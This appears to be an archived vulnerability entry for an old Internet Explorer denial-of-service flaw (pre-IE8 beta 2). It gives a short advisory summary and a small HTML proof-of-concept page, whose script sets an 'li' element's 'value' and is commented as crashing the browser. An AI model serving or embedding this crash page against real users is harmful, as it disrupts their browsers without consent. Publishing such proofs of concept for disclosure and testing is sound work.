9 lines
No EOL
886 B
HTML
9 lines
No EOL
886 B
HTML
source: https://www.securityfocus.com/bid/36070/info
|
|
|
|
Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
|
|
|
|
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
|
|
|
|
Versions prior to Internet Explorer 8 beta 2 are vulnerable.
|
|
|
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head><title>IE crash bug</title> <script type="text/javascript"> var li = document.createElement("li"); li.setAttribute("value", "1"); // this crashes IE! li.value = "1"; // this also crashes IE! </script> </head><body> <h1>IE crash bug test</h1> </body></html> |